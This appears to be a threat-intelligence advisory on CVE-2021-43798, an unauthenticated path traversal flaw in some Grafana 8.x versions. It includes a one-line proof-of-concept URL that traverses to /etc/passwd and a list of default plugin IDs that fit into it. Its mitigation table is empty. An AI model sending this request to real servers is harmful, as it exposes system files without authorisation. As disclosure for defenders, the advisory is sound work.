Category | Vulnerability Intelligence |
Vulnerability Class | Local File Inclusion(Unauthenticated) |
CVE ID | CVE-2021-43798 |
CVSS:3.0 Score | 7.5 |
TLP | GREEN |
Reference | *https://en.wikipedia.org/wiki/Intelligence_source_and_information_reliability #https://en.wikipedia.org/wiki/Traffic_Light_Protocol |
Executive Summary
- Grafana recently released an advisory and patch for a critical path traversal vulnerability which leads to an unauthenticated Local File inclusion.
- Grafana is a multi-platform open-source analytics and interactive visualization web application.
- This vulnerability affects Grafana versions v8.0.0-beta1 through v8.3.0, however, the Grafana Cloud remains unaffected.
- Threat actors can leverage this flaw by crafting an HTTP request to read sensitive files from servers, thus leading to sensitive information disclosure.
Analysis
- Grafana is an open-source solution for generating metrics and data about applications and then creating dashboards that provide insight into user behavior, application behavior, the frequency of errors occurring in production or a pre-production environment, the type of errors occurring, and the contextual scenarios by providing relative data, among other things.
- Grafana has become a popular solution to analyze and generate data. According to Censys, Grafana is currently running on 114,575 instances.
Search results from Censys
- To exploit this vulnerability, an attacker simply needs to send a GET request to the targeted instance. For example: POC - {host}/public/plugins/{pluginID}/../../../../../../../../etc/passwd
- alertlist
- annolist
- barchart
- bargauge
- candlestick
- cloudwatch
- dashlist
- Elasticsearch
Information from OSINT
Ever since this vulnerability was made public, there has been continuous scanning for vulnerable targets. Because of the ease of exploitation, threat actors have begun exploiting this vulnerability on a large scale, in the wild. Multiple POC scripts are also available for this vulnerability, on various open-source platforms such as GitHub.Vulnerability Analysis
The vulnerability arises as a result of an interesting scenario in which the developer either misunderstood or did not thoroughly read the documentation of the functions being used, which is available at: pkg/api/plugins.goImpact & Mitigation
Impact | Mitigation |
|
|